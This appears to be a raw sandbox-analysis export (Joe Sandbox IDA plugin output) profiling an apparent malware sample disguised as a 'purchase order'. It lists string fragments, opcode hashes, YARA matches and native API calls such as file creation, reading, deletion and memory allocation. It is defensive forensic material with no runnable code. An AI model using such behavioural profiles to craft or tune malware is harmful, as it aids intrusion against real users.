                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 015D7BAC
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 015D7B7F
                                                                                                              • RTL: Resource at %p, xrefs: 015D7B8E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D728C
                                                                                                              Strings
                                                                                                              • RTL: Re-Waiting, xrefs: 015D72C1
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 015D7294
                                                                                                              • RTL: Resource at %p, xrefs: 015D72A3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 0-1194432280
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: "1$&E$'S$:f$=$F$Il$L6$LP$PY$Z $\$]s$]sPY$_$`$c$c\$c\$g$j$oS$s$v$w$wP$D
                                                                                                              • API String ID: 0-3100882789
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6$O$S$\$s
                                                                                                              • API String ID: 0-3854637164
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: &Cd_
                                                                                                              • API String ID: 0-746913441
                                                                                                              • Opcode ID: 5c891511ddcffe548a61c68face75fe87426266056f99a069d4ac1df79e7fad8
                                                                                                              • Instruction ID: e3bb386817c157ca7eb429c0125f247e0b7288f9721cf5d853472f3b92ebc946
                                                                                                              • Opcode Fuzzy Hash: 5c891511ddcffe548a61c68face75fe87426266056f99a069d4ac1df79e7fad8
                                                                                                              • Instruction Fuzzy Hash: C201D0F6D0121DAFCB41DFE8D9419EEFBF8BB08600F14426AE919F6200F7705A048BA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b45fbb8299b444f6f690778c8069fb8cdd6ca81a7881611312d79426a84a1a3c
                                                                                                              • Instruction ID: 2bfe1c226f3f0961418e893920f7570c27765cda52b47282283d7a4debd98aae
                                                                                                              • Opcode Fuzzy Hash: b45fbb8299b444f6f690778c8069fb8cdd6ca81a7881611312d79426a84a1a3c
                                                                                                              • Instruction Fuzzy Hash: 57410CB1D11229AFDB14CF99C885AEEBBBCFF49710F10415AFA14E6240E7B09640CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4ebc6facd25896281664b8750a2dea360fec6b2184a5f688c675de731d68b5a3
                                                                                                              • Instruction ID: 51b719c6ced7c6e895195b6cf588ab74e6eaafe775ded74dbfe9038b7ecc1a51
                                                                                                              • Opcode Fuzzy Hash: 4ebc6facd25896281664b8750a2dea360fec6b2184a5f688c675de731d68b5a3
                                                                                                              • Instruction Fuzzy Hash: 6031F8B5A00608ABDB14DF98C881EEFB7B9EF88710F108219F909A7240D774A911CFA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bf33bb16f2c46a21a11e7edf9585b111042fb5818533fd214216d73f8327f827
                                                                                                              • Instruction ID: afd02024915f5cbddff0ef587489aa4a565bf1a4a7e9ed46e49dae0821c563e2
                                                                                                              • Opcode Fuzzy Hash: bf33bb16f2c46a21a11e7edf9585b111042fb5818533fd214216d73f8327f827
                                                                                                              • Instruction Fuzzy Hash: 762116B5A00609ABDB14DF98CC85FEFB7B8EF88710F108519FD19AB240D770A911CBA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a7f6b4cdc90cbb617ecd447e14cd3136dbeaf26399e7dbfdcdf17970354c06e8
                                                                                                              • Instruction ID: 1a78a5a2b50d31717fe6d689a3abdd07829c59ca8943f87e6063305ddf4379bb
                                                                                                              • Opcode Fuzzy Hash: a7f6b4cdc90cbb617ecd447e14cd3136dbeaf26399e7dbfdcdf17970354c06e8
                                                                                                              • Instruction Fuzzy Hash: EA11A0B63803047AF720EA558C43FAB736D9B84B11F244009FB08AE2C0EAB4F81146B9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d7d33b197e29d26b6d9b05018973f997e1e08bcbcfa7e99738ffcf16360b50ea
                                                                                                              • Instruction ID: 34fd18c17293307122e31a2425f59182f1498508672acb62ddf54d7c9ad85961
                                                                                                              • Opcode Fuzzy Hash: d7d33b197e29d26b6d9b05018973f997e1e08bcbcfa7e99738ffcf16360b50ea
                                                                                                              • Instruction Fuzzy Hash: F1113A772086E65BD721CF7CACD4B9BBBE4ABC6634B18036AE8948F582D3318445C750
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Strings
                                                                                                              • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                              • API String ID: 0-1002149817
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                              • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                              • String ID: /$1$4$:$I$`$f$o$w
                                                                                                              • String ID: .$P$e$i$m$o$r$x
                                                                                                              • String ID: L$S$\$a$c$e$l
                                                                                                              • String ID: F$P$T$f$r$x
                                                                                                              • String ID: $i$l$o$u
                                                                                                              • String ID: $i$l$o$u
                                                                                                              • String ID: $e$k$o
                                                                                                              • String ID: $e$h$o
                                                                                                              • String ID: $e$k$o
                                                                                                              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                              • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                                                              • String ID: $e$h$o
                                                                                                              • String ID: 7$G$K$t
                                                                                                              • API String ID: 0-1935247632
                                                                                                              • Opcode ID: c96162170292c71e8470298acf7be25ebe17fe702fc4e108b2b52951027e04a7
                                                                                                              • Instruction ID: baa60b497063ac171bebc33ca925aa39208d930bc7f79f03daa7eb415c57cbe3
                                                                                                              • Opcode Fuzzy Hash: c96162170292c71e8470298acf7be25ebe17fe702fc4e108b2b52951027e04a7
                                                                                                              • Instruction Fuzzy Hash: A03164B5910208BBEB04DB94CC45FFEB7B8EF49304F444199ED08AB240EB75AA148BE5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $e$k$o
                                                                                                              • API String ID: 0-3624523832
                                                                                                              • Opcode ID: fe875d4f46ff4c6fbdd37e93ba187611f4f021ca6218b298dd0cd8ea7781120c
                                                                                                              • Instruction ID: a69d30a0f4d211f7e1c7e85c43e31c8833fd32090eac60303d7ae5591b667284
                                                                                                              • Opcode Fuzzy Hash: fe875d4f46ff4c6fbdd37e93ba187611f4f021ca6218b298dd0cd8ea7781120c
                                                                                                              • Instruction Fuzzy Hash: C311ACB2900208AFDB14DF98D8C4ADEBBB9FF48314F048259E919AB205E771A544CBA0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $e$k$o
                                                                                                              • API String ID: 0-3624523832
                                                                                                              • Opcode ID: c8dcd472c93be491c28914bba79a1b6c957f5ddb905f78957cbad4fc6862d5c5
                                                                                                              • Instruction ID: a64be0ad33b6803ee7d702d1e247d52797ca4fab230bb062f48801d4ddce3f3c
                                                                                                              • Opcode Fuzzy Hash: c8dcd472c93be491c28914bba79a1b6c957f5ddb905f78957cbad4fc6862d5c5
                                                                                                              • Instruction Fuzzy Hash: B901C4B2900308ABDB14DF98D884BDEF7B9FF08314F44821DE9196B201E771A544CBA0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3518031522.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 034F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_34f0000_olMGHvjsNFhNU.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ($NDI\$ORAX$Z
                                                                                                              • API String ID: 0-580376826
                                                                                                              • Opcode ID: cba09048254eeb7f0f368994795b7c683c278a2b283cc14a166a9dd249642e1c
                                                                                                              • Instruction ID: 00ba23540938318265873a96967d38c8826274e51c3f6410a2a432799c6bb765
                                                                                                              • Opcode Fuzzy Hash: cba09048254eeb7f0f368994795b7c683c278a2b283cc14a166a9dd249642e1c
                                                                                                              • Instruction Fuzzy Hash: 76F0E2B5900208AACB00DFE8C888BEEFF74EF81700FA545A8C8545B201D7709614CBA2

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:2.5%
                                                                                                              Dynamic/Decrypted Code Coverage:4.1%
                                                                                                              Signature Coverage:2.2%
                                                                                                              Total number of Nodes:458
                                                                                                              Total number of Limit Nodes:80

                                                                                                              Control-flow Graph

                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: "n$)t$,$/a$8n$=G$@$B`$PY$Pq$Yu$Z4$jJ$m@$p$us$x`$z)$z`$q$~
                                                                                                              • API String ID: 0-299318214
                                                                                                              • Opcode ID: 3d6d2a7bf567a0c0f251756bac415fa3dd12f0075b81f000199c5c1cc8754ae8
                                                                                                              • Instruction ID: 0cbfe349b7334380acb2ddd2d165928e47e8557837996628b502eef4d98890b2
                                                                                                              • Opcode Fuzzy Hash: 3d6d2a7bf567a0c0f251756bac415fa3dd12f0075b81f000199c5c1cc8754ae8
                                                                                                              • Instruction Fuzzy Hash: BF22C2B0D05629CFEB24CF45C894BDDBBB2BB44308F1081D9C64DAB280DB756A89DF65
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 02CECA24
                                                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 02CECA5F
                                                                                                              • FindClose.KERNELBASE(?), ref: 02CECA6A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$File$CloseFirstNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 3541575487-0
                                                                                                              • Opcode ID: 9d27a8dcd305fc1bab0a29c7ea9d517702547bd46d60a9d6759da10dfb66ff6c
                                                                                                              • Instruction ID: df43f4fc9e7215c7d7a38536b8666edb91b493fdf648533fcfc29ea34cb1cf22
                                                                                                              • Opcode Fuzzy Hash: 9d27a8dcd305fc1bab0a29c7ea9d517702547bd46d60a9d6759da10dfb66ff6c
                                                                                                              • Instruction Fuzzy Hash: CE317271A40308BBDF60DFA4CC85FEF777D9F84B44F144559BA19A6180DBB0AB849BA0
                                                                                                              APIs
                                                                                                              • NtCreateFile.NTDLL(?,?,?,C3714B7A,?,?,?,?,?,?,?), ref: 02CF9661
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: e3c55a6a012d0c960e2372c45c7d93e030ed8fa0c9b77380962c01b5fbf43196
                                                                                                              • Instruction ID: 7d9a02e318501ded4be8b50f9540f14f6648680ae47259fc96c4ad3162014d53
                                                                                                              • Opcode Fuzzy Hash: e3c55a6a012d0c960e2372c45c7d93e030ed8fa0c9b77380962c01b5fbf43196
                                                                                                              • Instruction Fuzzy Hash: 9A31C2B5A01248ABDB54DF98D880EEFB7F9AF8C304F108219F909A7240D770A951CFA4
                                                                                                              APIs
                                                                                                              • NtReadFile.NTDLL(?,?,?,C3714B7A,?,?,?,?,?), ref: 02CF97B9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2738559852-0
                                                                                                              • Opcode ID: d26101aeaaa043df99420354c37e34887d72040b686b126e709cff6c41da8d29
                                                                                                              • Instruction ID: ddc50993487c3158a2d8a26c917e37c1e87071e5d38fa626fe255ca8663b51bc
                                                                                                              • Opcode Fuzzy Hash: d26101aeaaa043df99420354c37e34887d72040b686b126e709cff6c41da8d29
                                                                                                              • Instruction Fuzzy Hash: 4131E5B5A00208AFDB54DF98D880EEFB7F9EF8C314F108219F919A7240D770A9118FA1
                                                                                                              APIs
                                                                                                              • NtAllocateVirtualMemory.NTDLL(02CE209E,?,02CF834F,C3714B7A,00000004,00003000,?,?,?,?,?,02CF834F,02CE209E,02CFB901,02CF834F,520F8B51), ref: 02CF9A98
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateMemoryVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2167126740-0
                                                                                                              • Opcode ID: ce89629044f2441d048d03dcdc22383d650bc2c2de4880009a5b8edf100d122a
                                                                                                              • Instruction ID: 276398b6005a0ab218b29623e1829d9e9cc84665afb4073b31720a7ac9194cf9
                                                                                                              • Opcode Fuzzy Hash: ce89629044f2441d048d03dcdc22383d650bc2c2de4880009a5b8edf100d122a
                                                                                                              • Instruction Fuzzy Hash: 3921E8B5A00609ABDB54DF98DC41FEFB7B9EF88710F108219FA19A7240D770A911CFA5
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DeleteFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 4033686569-0
                                                                                                              • Opcode ID: 954619f73f159c906b658b08830aa2f3d9ebf4970ffdbfa5db3952952fb91dc1
                                                                                                              • Instruction ID: 376b22ae81696b8f245b999c15411075baa5da1678e7c23b0b8018a8ea003971
                                                                                                              • Opcode Fuzzy Hash: 954619f73f159c906b658b08830aa2f3d9ebf4970ffdbfa5db3952952fb91dc1
                                                                                                              • Instruction Fuzzy Hash: 8F119171600208ABD760EAA8CC41FEBB7ADDF85714F108109FA0956180D7B17A158FE1
                                                                                                              APIs
                                                                                                              • NtClose.NTDLL(?,02CE3443,001F0001,?,00000000,?,?,00000104), ref: 02CF98A4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3516914992.0000000002CD0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_2cd0000_cacls.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Close
                                                                                                              • String ID:
                                                                                                              • API String ID: 3535843008-0
                                                                                                              • Opcode ID: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                                                                              • Instruction ID: 829bebba8803aec0a05c3aa86350e57140e3f1f0047d939d649d0f9f8973cdd4
                                                                                                              • Opcode Fuzzy Hash: 1ccfb7074c235d79d87762803b7bffdee7b431a73409e616f994fa16c9a62f17
                                                                                                              • Instruction Fuzzy Hash: F7E046362102187BC220BA69DC00FDBB7ADEBC5760F008415FA0CA7241CAB0BA518BE0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 4c835c818ec0c59e2b0edad9d93b517ac44a529032b69ae246f694281c7cdf10
                                                                                                              • Instruction ID: e78fc805eb3a1ff7b259a08f45f65a50001f4fee415b6dfa5fd377b8cbedae6f
                                                                                                              • Opcode Fuzzy Hash: 4c835c818ec0c59e2b0edad9d93b517ac44a529032b69ae246f694281c7cdf10
                                                                                                              • Instruction Fuzzy Hash: 6A90023170580412A540B15858845464045A7E1311B59C012E4428555C8B148A565365
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: ad1f30869c1443536922f671cd8a7b244c63f12914ca1daeae14300550ac0dbb
                                                                                                              • Instruction ID: ea5bc3e737f180f4a32a4b833f751c1bc1324cf1e5fab71bba7629704b3e2e65
                                                                                                              • Opcode Fuzzy Hash: ad1f30869c1443536922f671cd8a7b244c63f12914ca1daeae14300550ac0dbb
                                                                                                              • Instruction Fuzzy Hash: 08900261701504425540B15858044066045A7E2311399C116A4558561C87188955926D
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: e0ce90cb0b584c13e48d7383a449eb6d0b5585906753d4962948b4a390f1b279
                                                                                                              • Instruction ID: d89e7cb4962880ed560362ea2a8aa0dac1defd00860fa24b542f3e9f87bc7a5c
                                                                                                              • Opcode Fuzzy Hash: e0ce90cb0b584c13e48d7383a449eb6d0b5585906753d4962948b4a390f1b279
                                                                                                              • Instruction Fuzzy Hash: 06900261302404035505B1585414616404A97E1211B59C022E5018591DC62589916129
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 985e8b88a9c7e585b3c03c7437f33f9a754561b8bc0f173da72bd94b3ee6c623
                                                                                                              • Instruction ID: 59a5d426e47d4671635a9620c984ce9457a625819e330f6c45bbbf3516d31434
                                                                                                              • Opcode Fuzzy Hash: 985e8b88a9c7e585b3c03c7437f33f9a754561b8bc0f173da72bd94b3ee6c623
                                                                                                              • Instruction Fuzzy Hash: 3F90023130140C02E580B158540464A004597D2311F99C016A4029655DCB158B5977A5
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.3518174469.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.3518174469.0000000003639000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.000000000363D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000007.00000002.3518174469.00000000036AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_3510000_cacls.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: c85754637973cd24f872f1073e304832b144a393f9b015a4ca5f6520809a694d
                                                                                                              • Instruction ID: aee8dcb8b707394a5300899977758a31db5bc04234b37dc22127e3a60c9ee79a
                                                                                                              • Opcode Fuzzy Hash: c85754637973cd24f872f1073e304832b144a393f9b015a4ca5f6520809a694d
                                                                                                              • Instruction Fuzzy Hash: 0390023130544C42E540B1585404A46005597D1315F59C012A4068695D97258E55B665
                                                                                                              APIs
                                                                                                              Memory Dump Source
